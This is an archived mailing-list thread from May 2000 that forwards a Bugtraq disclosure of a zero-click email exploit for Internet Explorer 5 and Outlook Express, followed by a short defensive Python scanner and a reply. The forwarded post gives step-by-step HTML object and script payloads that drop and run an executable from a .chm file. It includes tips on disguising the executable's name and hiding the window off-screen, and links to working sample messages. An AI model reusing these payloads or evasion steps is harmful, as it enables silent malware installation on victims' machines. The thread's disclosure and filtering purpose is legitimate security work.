[Esa-l] ALERT: MICROSOFT SECURITY FLAW? (forwarded from bugtraq)

John D. Hardin jhardin at wolfenet.com
Thu May 18 21:20:10 PDT 2000


Okay, folks, a working example of an exploit that installs *and runs*
an executable via email *WITHOUT* user intervention has just been
posted to Bugtraq.

MAKE SURE that "*.chm" is in your poisoned executables list, and that
your MANGLE_EXTENSIONS setting (if you're overriding the default)
includes "chm".

--
 John Hardin KA7OHZ   ICQ#15735746   http://www.wolfenet.com/~jhardin/
 jhardin at wolfenet.com      pgpk -a finger://gonzo.wolfenet.com/jhardin
  768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
 1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
  "Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
  does quite what I want. I wish Christopher Robin was here."
				-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
   164 days until Daylight Savings Time ends

---------- Forwarded message ----------
Date: Mon, 15 May 2000 18:37:31 -0700
From: "http-equiv at excite.com" <http-equiv at excite.com>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: MICROSOFT SECURITY FLAW?

Saturday, May 13, 2000

MICROSOFT SECURITY FLAW?

Silent delivery and installation of an executable on a target computer. No
client input other than opening an email or newsgroup post.

1. Using the following, this can be accomplished with the default
installation of Windows 95 and 98 and Internet Explorer 5 browsers and
accompanying mail/news clients.

2. The key component is from Georgi Guninski:

http://www.nat.bg/~joro/wordpad-desc.html

3. The secondary component comprises a pre-installed ActiveX control directly
from Microsoft. This control and a variety of similar demonstrations were
shown to Microsoft over 18 months ago.

What to do:

A

(a) Manufacture a *.chm file. The following kit from Microsoft, Microsoft®
HTML Help, is free and very easy to use:

http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm

(b) Construct a new *.chm file inputting the ActiveX link control as
follows:

<DEFANGED_OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
  width=100 height=100>
 <PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap:shortcut">
 <PARAM name="Item1" value=",C:\WINDOWS\TEMP\MALWARE.exe,">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<DEFANGED_SCRIPT>

AA.Click();
</SCRIPT>

(c) The control itself is quite sensitive to manipulation; the above
represents the bare minimum to run.

(d) Input the path of the executable you intend to run as in PARAM
name="Item1" above. In order to disguise the running of the executable it is
suggested not to give it a silly name, rather something that is familiar
to the operating system, e.g. microsoftagent.exe etc.

(e) While constructing the *.chm, it is possible to both minimise and offset
the location of the *.chm file once opened. For example, while under
construction you can set the size of the help window and its location:
using the auto resizer in Microsoft® HTML Help, drag the sizer to the
smallest possible size. Although setting the size requires clicking OK
inside the autosizer, dragging to minimal size and hitting ENTER will
register the setting. Secondly, offset the location of the file by inputting
say 2000, 2000; this should suffice for it to open off-screen on any size
monitor.

(f) Once you have compiled the *.chm, test its functionality by placing the
executable in your temp folder and opening the *.chm; it should run the
executable.

Now how do we place this on the target computer?

B.

(a) Simply by opening an email message or newsgroup post. The client does
nothing. They receive an email and open it, or read a newsgroup post, and that is
all. Both the *.exe and *.chm are transferred silently and immediately to
the temp folder once the email or newsgroup post is open.

How so?

(b) It is possible to embed almost anything in both html email and html
news. Current versions of Outlook Express 5 inspect whether what is being
embedded is in fact the correct file, e.g. <img src="abc.doc"> will not embed
because a *.doc is obviously not an image file. Internet Explorer 4 and
accompanying Outlook Express 4 do allow for this; similarly, Netscape
Messenger also allows for this. Nevertheless, through proprietary JavaScript
and VBscript, it is possible to deliver an intact file to the target
computer's temp folder, however with a file name given by the computer, e.g.
000321.doc. This does not serve the purpose of running the *.chm with the
file name explicit as above.

(c) The Microsoft Active Movie Control (AMC), pre-registered and
pre-installed on all Internet Explorer 5 computers, does. The very simple
scripting to do this is as follows:

<DEFANGED_OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>

<PARAM NAME="Filename" VALUE="C:\WINDOWS\DESKTOP\MALWARE.chm">

<DEFANGED_OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>

<PARAM NAME="Filename" VALUE="C:\WINDOWS\DESKTOP\MALWARE.exe">

(d) This control too is very sensitive and the complete path must be
inserted in order for it to embed in the html email message or html news
post.

(e) Finally, in the body of the html email or html news post the following
simple JavaScript is required to set off everything:

<DEFANGED_SCRIPT>

setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);

</SCRIPT>

Sufficient delay must be allowed for the news post or email message and the
transfer of both the executable and *.chm files to be delivered to the
target computer's temp folder before execution is called.

What will happen?

When the email or news post is opened, the embedded *.chm and *.exe will
automatically and silently be transferred to the client temp folder, intact
and with the given names. Default locations on all machines call for the
temp folder to be at C:\windows\temp. The AMC control will deposit the two
files to wherever the temp folder is located; if you have changed the
location, these two files will still be delivered there, however because the
*.chm file is constructed to seek out the *.exe in the default location, it
will fail. Likewise so will the script in the html email message or news
post. Hence, this will only work on default OS installs.

Once the news post or email has been opened or even previewed via the Outlook
or Outlook Express preview pane, the two files are delivered to the temp
folder; after sufficient time elapses, the script in the html message calls
the *.chm, which opens silently and minimised in the task bar (because we
have instructed it to open at the minimum size and off-set 2000, 2000); once
opened, the ActiveX link control in it runs the executable.

Everything is instantaneous, no need for a reboot and no need for user
interaction other than opening the email (or simply previewing it) or the
newsgroup post. Needless to say, once the executable is running, the damage
is done. And no Windows Scripting Host (WSH) involved.

The only solution is to relocate the temp folder and/or set scripting and
ActiveX controls to the highest possible settings. The default settings do
not ask for permission.

Below represents a working example. The executable incorporated is a
harmless joke program. In order to run it, save the entire example as either
*.nws or *.eml and click on it:

note: 1/ on high speed machines and i-connections with IE5, clicking the
links below will allow for viewing of these news and mail files in the
browser (technically known as mhtml), with the same effect. Slower machines
and i-connections might want to save to disk and open from there.
Additionally, saving to disk and opening will allow for viewing in the mail
or news client.

note: 2/ it is not necessary to run this through html mail or news; applying
all the above directly on the web results in the same.

Right-click and save to desktop

Mail:  http://members.xoom.com/malware/help.eml  89KB

News: http://members.xoom.com/malware/help.nws  89KB
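As an added example (not John Hardin's sanitizer and not code from the post), here is a small Python check that applies his advice on the mail-gateway side: it walks a constructed MIME message and flags parts whose names carry a poisoned extension, HTML that instantiates either of the two control class IDs named in the post, and the window.showHelp() trigger. The sample message and its file names are constructed for the demonstration.

```python
import email
import re
from email import policy

# Constructed sample message (not from the original post): an HTML body that
# embeds the Active Movie Control and calls window.showHelp, plus a .chm part.
SAMPLE_EML = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html; charset="us-ascii"

<html><body>
<OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A width=1 height=1>
<PARAM NAME="Filename" VALUE="C:\\WINDOWS\\DESKTOP\\help.chm">
<SCRIPT>setTimeout('window.showHelp("c:/windows/temp/help.chm");',15000);</SCRIPT>
</body></html>
--B1
Content-Type: application/octet-stream; name="help.chm"
Content-Disposition: attachment; filename="help.chm"
Content-Transfer-Encoding: base64

SGVsbG8=
--B1--
"""

# Extensions the alert says must be on the poisoned list.
POISONED_EXTENSIONS = {"chm", "exe"}

# Class IDs named in the post: the HTML Help shortcut control that launches
# the executable, and the Active Movie Control used to drop the files.
KNOWN_CLSIDS = {
    "adb880a6-d8ff-11cf-9377-00aa003b7a11",
    "05589fa1-c356-11ce-bf01-00aa0055595a",
}
CLSID_RE = re.compile(r'classid\s*=\s*"?clsid:([0-9a-f-]{36})', re.I)
SHOWHELP_RE = re.compile(r"window\.showHelp\s*\(", re.I)

def scan_message(raw):
    """Return a list of findings (strings) for a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if name and name.rsplit(".", 1)[-1].lower() in POISONED_EXTENSIONS:
            findings.append(f"poisoned attachment: {name}")
        if part.get_content_type() == "text/html":
            html = part.get_content()
            for clsid in CLSID_RE.findall(html):
                if clsid.lower() in KNOWN_CLSIDS:
                    findings.append(f"known dropper/launcher control: {clsid.lower()}")
            if SHOWHELP_RE.search(html):
                findings.append("script calls window.showHelp()")
    return findings
```

A gateway would quarantine or mangle the flagged part rather than only report it; the findings list is what such a policy would act on.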



Date: Fri, 19 May 2000 00:07:23 -0600
To: "John D. Hardin" <jhardin at wolfenet.com>, Email Security Announce list <esa-l at spconnect.com>
From: Brett Glass <brett at lariat.org>
Subject: Re: [Esa-l] ALERT: MICROSOFT SECURITY FLAW? (forwarded from bugtraq)

John:

And I thought I was going to get some sleep tonight! I suspect that
it will be less than a day before we see a worm based on this tearing
up the Internet. Gads.

--Brett Glass

At 10:20 PM 5/18/2000, John D. Hardin wrote:
   

>Okay, folks, a working example of an exploit that installs *and runs*
>an executable via email *WITHOUT* user intervention has just been
>posted to Bugtraq.
>
>MAKE SURE that "*.chm" is in your poisoned executables list, and that
>your MANGLE_EXTENSIONS setting (if you're overriding the default)
>includes "chm".